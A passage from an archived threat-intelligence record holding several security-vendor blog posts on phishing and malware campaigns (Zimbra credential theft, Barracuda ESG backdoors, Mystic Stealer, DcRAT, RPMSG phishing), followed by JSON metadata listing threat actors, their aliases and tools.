To find\r\nout more, give the TitanHQ team a call. The product is available on a 100% free trial if you want to put it to the\r\ntest, and product demonstrations can be arranged on request.\r\nSimple, Yet Effective Phishing Campaign Targets Zimbra Collaboration Credentials\r\nby G Hunt | August 23, 2023 | Phishing \u0026 Email Spam\r\nPhishing campaigns do not need to be especially sophisticated to be effective, as a recently identified campaign\r\nthat targets Zimbra Collaboration credentials clearly demonstrates. Zimbra Collaboration, previously known as\r\nZimbra Collaboration Suite, is a software suite that includes an email server and web client. Zimbra Collaboration\r\nemail servers are targeted by a range of different threat actors, including state-sponsored hackers and\r\ncybercriminals, for espionage, conducting phishing attacks, and gaining a foothold that can be used for a more\r\nextensive compromise of an organization.\r\nThis global campaign targets users’ credentials and does not appear to be aimed at any specific sector; the\r\nthreat actor behind the campaign and their motives are not known. 
The highest numbers of attacks have occurred in\r\nPoland, Ecuador, and Italy. Like many phishing campaigns, the emails warn users about a security update, security\r\nissue, or pending account deactivation, and the emails appear to have been sent from an email server\r\nadministrator.\r\nThe emails include an HTML attachment, which is opened as a locally hosted page in the user’s browser. The\r\nHTML file displays a Zimbra login prompt that is tailored for each organization and includes their logo and name,\r\nand the targeted user’s username is prefilled. If the user enters their password, the credentials are transmitted to\r\nthe attacker’s server via an HTTPS POST request.\r\nThe campaign was identified by security researchers at ESET, who observed waves of phishing emails being sent\r\nfrom companies that had previously been targeted, which suggests that some of the attacks have allowed the threat\r\nactor to compromise administrator credentials and set up new mailboxes to target other organizations.\r\nDespite the simplicity of the campaign, it has proven to be very effective, even though the login prompt in the\r\nHTML file differs considerably from the genuine Zimbra login prompt, and the page is opened locally, which\r\nsuggests a lack of security awareness training given the failure to identify the red flags in the emails. The emails\r\nare also likely to have a low detection rate by email security solutions, as the only malicious element is a single\r\nlink to a malicious host, which is within the HTML file rather than the email body.\r\nPhishing remains one of the most effective ways for hackers to gain initial access to networks. Combating\r\nphishing attacks requires a combination of measures. A spam filter such as SpamTitan should be used to block the\r\nemails and prevent them from reaching their intended targets. 
SpamTitan incorporates signature-based and\r\nbehavioral detection mechanisms for identifying malware, link scanning, and reputational checks to ensure a high\r\ncatch rate and low false positive rate.\r\nNo spam filtering solution will be able to block all malicious emails without also having an unacceptably high\r\nfalse positive rate, so it is important to also provide regular security awareness training to employees to teach them\r\nhow to recognize and avoid malicious emails. Security awareness training should also incorporate phishing\r\nsimulations to give employees practice at identifying threats. If a threat is not detected, it can be turned into a\r\ntraining opportunity. TitanHQ’s security awareness training platform – SafeTitan – delivers instant training in\r\nresponse to a failed phishing simulation, and also delivers training in response to other security mistakes, ensuring\r\ntraining is provided when it has the greatest impact. Training data shows that SafeTitan reduces employee\r\nsusceptibility to phishing attacks by up to 80%, and combined with SpamTitan email security, ensures that\r\nbusinesses are well protected from phishing attacks and other cyber threats.\r\nSpamTitan and SafeTitan, like all TitanHQ solutions, are available on a free trial and product demonstrations can\r\nbe arranged on request.\r\nNew Backdoor Malware Variants Deployed on Barracuda ESG Appliances\r\nby G Hunt | July 31, 2023 | Email Scams\r\nA zero-day vulnerability in Barracuda Email Security Gateway (ESG) appliances was exploited to deliver three\r\nmalware variants onto the devices. These previously unknown malware variants have been dubbed SeaSide,\r\nSaltwater, and SeaSpy, with the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) recently reporting\r\nthat an additional malware backdoor dubbed Submarine was also deployed in the attacks.\r\nInitially, Saltwater malware – a trojanized Barracuda SMTP daemon – was used and allowed the threat actor to\r\nperform several actions such as stealing files, running shell commands remotely, and proxying traffic to evade intrusion\r\ndetection systems. SeaSpy malware was deployed to provide persistence and monitor SMTP traffic, and SeaSide\r\nmalware was used to establish reverse shells and connect with the attacker’s command-and-control server, which\r\nallowed remote code execution via SMTP HELO/EHLO messages and provided the attacker with complete\r\ncontrol of the appliances, allowing additional malware payloads to be delivered.\r\nAccording to CISA, “SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language\r\n(SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process,\r\nenable execution with root privileges, persistence, command and control, and cleanup.”\r\nThe zero-day vulnerability in the Barracuda ESG is tracked as CVE-2023-2868 and is a remote command\r\ninjection vulnerability, a patch for which has now been released. The vulnerability could be exploited remotely by\r\na threat actor with a malicious email message – an email with a specially crafted .tar file attachment that\r\nmasqueraded as a harmless .jpeg or .dat file. 
The attachment was used to exploit the vulnerability and gain access\r\nto ESG appliances.\r\nThe exploitation of the vulnerability has been linked with a pro-China hacking group tracked as UNC4841, which\r\nwas discovered to have conducted a series of attacks in May, although CISA reports that the threat actor may have\r\nbeen exploiting the vulnerability undetected since as early as October 2022 to gain access to ESG appliances and\r\nsteal data.\r\nWith access to ESG appliances, the threat actor was free to remotely execute code for months. The ESG\r\nappliances are used across the public and private sectors, including government organizations, so the\r\ncompromise of the appliances since October 2022 is of particular concern, as the threat actor may have been\r\nable to steal sensitive data for several months undetected. Many large companies also use Barracuda’s ESG\r\nappliances, including Delta Airlines, Kraft Heinz, Samsung, and Mitsubishi, all of which were affected.\r\nWhile the vulnerability has been patched, UNC4841 has proven to be very persistent, switching its persistence\r\nmechanisms when the attacks were detected. Indicators of Compromise and MD5 hashes were issued by\r\nBarracuda to help clients determine if their ESG devices had been compromised, and Barracuda even offered its\r\ncustomers a new appliance, regardless of their patch status.\r\nThese attacks involved the discovery and exploitation of a previously unknown vulnerability in the ESG\r\nappliances and were the work of highly skilled hackers, although, like many attacks, the vulnerability was\r\nexploited via a malicious email. 
An extra layer of protection can be provided by SpamTitan Plus, which\r\nspecifically combats phishing emails and incorporates signature-based and AI-based behavioral detection\r\nmechanisms to improve protection against zero-day threats, including novel malware variants. Using SpamTitan\r\nPlus in addition to other security solutions will greatly improve the probability of detecting and blocking\r\nmalicious emails and zero-day threats. These attacks demonstrate why it is important to have multiple layers of\r\nsecurity, and not to rely on a single cybersecurity solution.\r\nNew Mystic Stealer Malware Proves Popular with Cybercriminal Community\r\nby G Hunt | June 22, 2023 | Internet Security, Network Security, Phishing \u0026 Email Spam\r\nA new information-stealing malware variant called Mystic Stealer is proving extremely popular with hackers. The\r\nmalware is currently being promoted on hacking forums and darknet marketplaces under the malware-as-a-service\r\nmodel, where hackers can rent access to the malware by paying a subscription fee, which ranges from $150 for a\r\nmonth to $390 for three months.\r\nAdverts for the malware first started appearing on hacking sites in April 2023, and the combination of low pricing,\r\nadvanced capabilities, and regular updates to the malware to incorporate requested features has seen it grow in\r\npopularity and become a firm favorite with cybercriminals. The team selling access to the malware operates a\r\nTelegram channel and seeks feedback from users on new features they would like to be added, shares development\r\nnews, and discusses various related topics.\r\nMystic Stealer has many capabilities, with more expected to be added. The first update to the malware occurred\r\njust a month after the initial release, demonstrating it is under active development and indicating the developers\r\nare trying to make Mystic Stealer the malware of choice for a wide range of malicious actors. 
Mystic Stealer\r\ntargets 40 different web browsers, 70 browser extensions, 21 cryptocurrency applications, 9 MFA and password\r\nmanagement applications (including LastPass Free, Dashlane, RoboForm, and NordPass), and 55 cryptocurrency\r\nbrowser extensions. The malware can also inject ads into browser sessions, redirect searches to malicious\r\nwebsites, and steal Steam and Telegram credentials and other sensitive data. The most recent version is also able\r\nto download additional payloads from its command-and-control server. The malware targets all Windows versions,\r\ndoes not need any dependencies, and operates in memory, allowing it to evade antivirus solutions. The\r\nmalware is believed to be of Russian origin since it cannot be used in the Commonwealth of Independent States.\r\nMystic Stealer has recently been analyzed by researchers at InQuest, Zscaler, and Cyfirma, who report that the\r\nmalware communicates with its C2 server via a custom binary protocol over TCP, and currently has at least 50 C2\r\nservers. When the malware identifies data of interest, it compresses it, encrypts it, then transmits it to its C2 server,\r\nwhere users can access the data through their control panel.\r\nThe main methods of distribution have yet to be determined, but as more threat actors start using the malware,\r\ndistribution methods are likely to become more diverse. 
The best protection is to follow cybersecurity best\r\npractices and adopt a defense-in-depth approach, with multiple overlapping layers of security to protect against all\r\nof the main attack vectors: email delivery (phishing), web delivery (pirated software, drive-by downloads,\r\nmalvertising), and the exploitation of vulnerabilities.\r\nEmail security solutions should be used that have signature- and behavior-based detection capabilities and\r\nmachine learning techniques for detecting phishing emails (SpamTitan). Antivirus software should be used,\r\nideally a solution that can scan memory, along with advanced intrusion detection systems. To protect against\r\nweb-based attacks, a web filter (WebTitan) should be used to block malicious file downloads and prevent access to\r\nthe websites where malware is often downloaded (known malicious sites/warez/torrent). IT teams should ensure\r\nthat software updates and patches are applied promptly, prioritizing critical vulnerabilities and known exploited\r\nvulnerabilities. In the event of infection, damage can be severely limited by having a tested incident response plan\r\nin place.\r\nFinally, it is important to train the workforce on the most common threats and how to avoid them. Employees\r\nshould be trained on how to identify phishing attempts, be told never to download unauthorized software from the\r\nInternet, and be taught security best practices. 
The SafeTitan security awareness training and phishing simulation\r\nplatform provides comprehensive training and testing to improve human defenses against malware infections and\r\nother cyber threats.\r\nFree OnlyFans Content Used as a Lure in DcRAT Malware Campaign\r\nby G Hunt | June 21, 2023 | Phishing \u0026 Email Spam\r\nMalicious actors are distributing malware under the guise of free access to paywall-protected OnlyFans content.\r\nOnlyFans is a popular Internet content subscription platform, where visitors can pay to receive premium content\r\nfrom a range of different content creators such as social media personalities, musicians, and celebrities, although\r\nthe 18+ subscription platform is most commonly associated with X-rated content. The malware campaign targets\r\nindividuals looking to access the latter for free.\r\nThe campaign uses fake OnlyFans content and X-rated lures promising access to private photos, videos, and posts\r\nwithout having to pay for the content. Users are tricked into downloading an executable file that installs a remote\r\naccess Trojan. A VBScript loader is contained in a ZIP file, and if executed, it will deliver a variant of\r\nAsyncRAT called DcRAT (aka DarkCrystal) – a remote access Trojan that provides access to the user’s device.\r\nDcRAT allows remote access, but can also access the webcam, log keystrokes, manipulate files, steal credentials,\r\ncookies, and Discord tokens, and encrypt files for extortion.\r\nResearchers at eSentire identified the campaign after a user attempted to execute the VBScript loader, although it\r\nis currently unclear how the ZIP file containing the VBScript loader is being distributed. As such, a defense-in-depth approach is recommended to block the most likely attack vectors. Phishing emails are commonly used for\r\ndistributing malware. Any email that claims to offer free access to OnlyFans is a major red flag since the site\r\nrequires paid subscriptions to access content. 
SEO poisoning may be used to get malicious websites to appear high\r\nin the search engine results for key search terms, and malvertising – malicious adverts – may be displayed on\r\nlegitimate websites through third-party ad networks that direct users to URLs where free content is offered.\r\nCompromised social media accounts may be used to post offers of free access to OnlyFans content, and SMS and\r\ninstant messaging service messages may advertise the offers and include links to malicious websites.\r\nAll of these ways of making contact with users can be combatted through phishing and security awareness training\r\nusing the SafeTitan platform. SafeTitan includes an extensive library of training content for creating security\r\nawareness training programs to improve awareness of threats, teach security best practices, and train users how to\r\nidentify phishing attempts. The platform also includes a phishing simulator for testing responses to phishing\r\nattacks, including phishing attempts with OnlyFans-related lures.\r\nEmail security solutions should be implemented to block any phishing attempts. SpamTitan incorporates signature\r\nand behavior-based detection mechanisms for identifying malicious attachments, link scanning, and machine\r\nlearning capabilities to identify zero-day phishing attacks. WebTitan Cloud can be used to improve protection\r\nagainst web-based attacks, such as malicious file downloads from malicious and compromised websites and to\r\nprevent access to risky categories of websites and websites that serve no work purpose. 
IT admins should also\r\nconsider implementing restrictions for script files, such as blocking VBScript and JavaScript from launching\r\ndownloaded executable content, or using the Group Policy Management Console to set the default “open with” program for\r\nscript files so that they are opened with notepad.exe. These measures will not only be effective at blocking this\r\nOnlyFans campaign but also at blocking attempts by other malicious actors to install malware and ransomware.\r\nRPMSG Attachments Used in Sophisticated Phishing Attacks to Steal M365 Credentials\r\nby G Hunt | May 30, 2023 | Email Scams, Phishing \u0026 Email Spam\r\nA new phishing technique has been identified by security researchers that uses compromised Microsoft 365\r\naccounts to send phishing emails that contain .RPMSG attachments, which are used in a sophisticated attack to\r\ngain access to Microsoft 365 accounts.\r\nRPMSG files are used to deliver e-mails with the Rights-Managed Email Object Protocol enabled. In contrast to\r\nregular emails that are sent in plain text and can be read by anyone or any security solution, these messages are\r\nencrypted and are stored as an encrypted file attachment. The files can also be used to limit the ability of users to\r\nforward or copy emails. The intended recipient can read the encrypted messages after they have been\r\nauthenticated, either by using their Microsoft 365 credentials or a one-time passcode.\r\nPhishing attacks using these files give the impression that the messages are protected and secured, as access is\r\nrestricted to authorized users. If a user is unfamiliar with RPMSG files and they perform a Google search, they\r\nwill quickly discover that these files are used for secure emails, giving the impression that the emails are genuine.\r\nThe use of RPMSG files in phishing attacks was discovered by researchers at Trustwave. 
In this scam, an email is\r\nsent from a compromised account, and since these accounts are at legitimate businesses, the emails appear\r\ngenuine. For example, one of the scams used a compromised account at the payment processing company Talus\r\nPay.\r\nThe emails are sent to targeted individuals, such as employees in the billing department of a company. The emails\r\nare encrypted, and credentials need to be entered before the content of the email can be viewed. In this campaign,\r\nthe emails tell the recipient that Talus Pay has sent them a protected message, and the email body includes a “Read\r\nthe message” button that users are prompted to click. The emails also contain a link that the user can click to learn\r\nabout messages protected by Microsoft Purview Message Encryption.\r\nIf the recipient clicks the link to read the message, they are directed to a legitimate Office 365 email webpage\r\nwhere they are required to authenticate with their Microsoft 365 credentials. After authentication, the user is\r\nredirected to a fake SharePoint document, which is hosted on the Adobe InDesign service. If they try to open the\r\nfile, they are directed to the final destination URL, which shows a “Loading… Wait” message, and while on that\r\nURL, a malicious script runs and collects system information. When that process is completed, a cloned Microsoft\r\n365 login form is displayed, which sends the username and password to the attacker’s command and control\r\nserver if entered. 
The script collects information such as visitor ID, connect token and hash, video card renderer\r\ninformation, system language, device memory, hardware concurrency, installed browser plugins, browser window\r\ndetails, and OS architecture.\r\nThe problem with phishing attempts involving encrypted content is that email security solutions are unable to decrypt\r\nthe content. In this scam, the only URL in the email directs the user to a legitimate Microsoft service, which is not\r\nmalicious, making these phishing attempts difficult to block without also blocking legitimate Microsoft encrypted\r\nemails. The key to preventing this type of sophisticated phishing attack is education. Through security awareness\r\ntraining, employees should be warned never to open unsolicited encrypted messages, even if the messages appear\r\nto have been sent by a legitimate user. They should also be conditioned to report any such messages to their IT\r\nsecurity team for further investigation.\r\nThe SafeTitan security awareness training program can be used by businesses to create training courses for\r\nemployees, tailored to each individual’s role and the threats they are likely to encounter. The training content is\r\nengaging to improve knowledge retention and can be easily updated to include information on the latest threats,\r\nsuch as phishing attacks involving RPMSG files. The platform also includes a phishing simulator that can be used\r\nto automate phishing simulations on the workforce, and RPMSG phishing emails can easily be incorporated into\r\nthe simulator to check whether employees are fooled by these sophisticated attacks. If a user fails a phishing\r\nsimulation, they are automatically provided with training content in real time relevant to the simulation they\r\nfailed. 
This on-the-spot training is the most effective way of re-educating the workforce and ensures training is\r\nprovided at the point when it is most likely to be effective.\r\nFor more information on SafeTitan security awareness training and phishing protection, call the TitanHQ team\r\ntoday.\r\nNamecheap Customers Targeted in Sophisticated Phishing Scam\r\nby G Hunt | February 22, 2023 | Phishing \u0026 Email Spam\r\nPhishing emails often spoof a company and include its logos and branding, but one of the red flags that allow\r\nthese emails to be identified by users is that the email address used in the campaign is set up on a domain unrelated to\r\nthe brand being spoofed. For instance, a phishing email spoofing FedEx is sent from a Gmail account. Oftentimes,\r\na display name is created that makes the email appear to come from a genuine account used by the spoofed\r\ncompany – FedEx customer service, for instance – but a quick check will reveal the actual email address used,\r\nallowing users to identify the phishing attack.\r\nHowever, these checks sometimes fail, as highlighted by a recent phishing campaign that impersonated the\r\nlogistics company DHL and the software cryptocurrency wallet provider MetaMask, which targeted customers of the\r\ndomain registrar Namecheap. 
The emails originated from the legitimate customer communication platform\r\nSendGrid, which Namecheap uses for sending marketing communications and renewal notices to customers.\r\nNamecheap responded quickly when the attack was identified and disabled the accounts, but not in time to prevent\r\nmany phishing emails from being sent.\r\nThe emails spoofing DHL included the DHL Express logo and warned recipients that their parcel could not\r\nbe delivered because the sender did not pay the necessary delivery fees; as such, the parcel had been retained at the\r\ndelivery depot and would not be released until the delivery fees were paid.\r\nThe MetaMask emails purported to be a Know Your Customer verification request, which required the recipient to\r\nverify their identity to prevent their account from being suspended. If the verification was not completed, the emails\r\nclaimed, users would be unable to withdraw or transfer funds without interruption.\r\nIn both cases, the emails included a link that the users were required to click to complete the request – a\r\nNamecheap.com marketing link that redirected users to a phishing page on an unrelated domain. This was not a\r\ndata breach at Namecheap, but at the third-party system the company uses for sending emails – SendGrid. It is\r\ncurrently unclear how SendGrid was hijacked to send the phishing emails.\r\nPhishing emails may be sent from legitimate company email accounts, either an account at the actual company\r\nbeing spoofed or other well-known services such as SendGrid. In the summer of 2022, a phishing campaign was\r\nconducted targeting customers of the hardware cryptocurrency wallet Trezor, following a hack at the email\r\nmarketing platform MailChimp.\r\nPhishing attacks such as these can sneak past email defenses and are harder for employees to identify, which is\r\nwhy businesses need to adopt a defense-in-depth approach. 
Email security solutions will block the majority of\r\nspam and phishing emails, but no email security solution will block all malicious messages. In addition to an\r\nadvanced email security solution such as SpamTitan – which incorporates multiple layers of protection and\r\nmachine learning mechanisms to block novel phishing attacks – businesses should invest in security awareness\r\ntraining for employees and should provide the training continually throughout the year. Through comprehensive\r\ntraining, employees can be taught more than just the basics and can learn how to recognize and avoid\r\nsophisticated phishing attacks.\r\nA web filter is also recommended for blocking access to the malicious URLs that are used to harvest sensitive\r\ninformation. A web filter augments the spam filter by providing time-of-click protection against malicious links in\r\nemails and also protects against non-email methods used to drive traffic to phishing sites, such as malvertising,\r\nsmishing, and vishing attacks.\r\nIf you want to improve protection against phishing, call TitanHQ to find out more about improving the depth of\r\nyour security protections through spam filtering, security awareness training, and web filtering.\r\nSource: https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nThe engine that powers these solutions has recently been shown to beat leading email security solutions such as\r\nMimecast for catch rate, malware catch rate, and has far lower false positives. In the June Virus Bulletin Test,\r\nTitanHQ had a 99.99% phishing catch rate, a spam catch rate of 99.98%, a malware catch rate of 100%, and zero\r\nfalse positives. 
PhishTitan catches 20 unique and sophisticated threats per 80,000 emails received that Microsoft",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/"
	],
	"report_names": [
		"emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates"
	],
	"threat_actors": [
		{
			"id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312",
			"created_at": "2024-06-07T02:00:03.998431Z",
			"updated_at": "2026-04-10T02:00:03.64336Z",
			"deleted_at": null,
			"main_name": "RansomHub",
			"aliases": [],
			"source_name": "MISPGALAXY:RansomHub",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a6814184-2133-4520-b7b3-63e6b7be2f64",
			"created_at": "2025-08-07T02:03:25.019385Z",
			"updated_at": "2026-04-10T02:00:03.859468Z",
			"deleted_at": null,
			"main_name": "GOLD VICTOR",
			"aliases": [
				"DEV-0832 ",
				"STAC5279 ",
				"Vanilla Tempest ",
				"Vice Society",
				"Vice Spider "
			],
			"source_name": "Secureworks:GOLD VICTOR",
			"tools": [
				"Advanced IP Scanner",
				"Advanced Port Scanner",
				"HelloKitty ransomware",
				"INC ransomware",
				"MEGAsync",
				"Neshta",
				"PAExec",
				"PolyVice ransomware",
				"PortStarter",
				"PsExec",
				"QuantumLocker ransomware",
				"Rhysida ransomware",
				"Supper",
				"SystemBC",
				"Zeppelin ransomware"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a8f551d-206b-48f0-8a03-ed34b29ca8b6",
			"created_at": "2024-10-04T02:00:04.748248Z",
			"updated_at": "2026-04-10T02:00:03.711864Z",
			"deleted_at": null,
			"main_name": "Storm-0494",
			"aliases": [],
			"source_name": "MISPGALAXY:Storm-0494",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8f68387a-aced-4c99-b2a6-aa85071a0ca3",
			"created_at": "2024-06-25T02:00:05.030976Z",
			"updated_at": "2026-04-10T02:00:03.656871Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "MISPGALAXY:Void Arachne",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a7805d1a-b8d0-4a42-ae86-1d8711e0b2b9",
			"created_at": "2024-08-28T02:02:09.729503Z",
			"updated_at": "2026-04-10T02:00:04.967533Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "ETDA:Void Arachne",
			"tools": [
				"Gh0stBins",
				"Gh0stCringe",
				"HoldingHands RAT",
				"Winos"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "de5630ec-93e0-4ef5-9ac3-fe422789e03d",
			"created_at": "2024-11-01T02:00:52.730802Z",
			"updated_at": "2026-04-10T02:00:05.330644Z",
			"deleted_at": null,
			"main_name": "INC Ransom",
			"aliases": [
				"INC Ransom",
				"GOLD IONIC"
			],
			"source_name": "MITRE:INC Ransom",
			"tools": [
				"PsExec",
				"Nltest",
				"Rclone",
				"AdFind",
				"esentutl",
				"INC Ransomware"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "af10aec6-36a8-4bdb-ba47-8f75b6a4aa4b",
			"created_at": "2025-03-07T02:00:03.797427Z",
			"updated_at": "2026-04-10T02:00:03.821929Z",
			"deleted_at": null,
			"main_name": "Larva-208",
			"aliases": [
				"EncryptHub"
			],
			"source_name": "MISPGALAXY:Larva-208",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "84aa9dbe-e992-4dce-9d80-af3b2de058c0",
			"created_at": "2024-02-02T02:00:04.041676Z",
			"updated_at": "2026-04-10T02:00:03.537352Z",
			"deleted_at": null,
			"main_name": "Vanilla Tempest",
			"aliases": [
				"DEV-0832",
				"Vice Society"
			],
			"source_name": "MISPGALAXY:Vanilla Tempest",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434804,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/32e7e9e18d0785cf45592e6d76a9440c5d0d2d46.pdf",
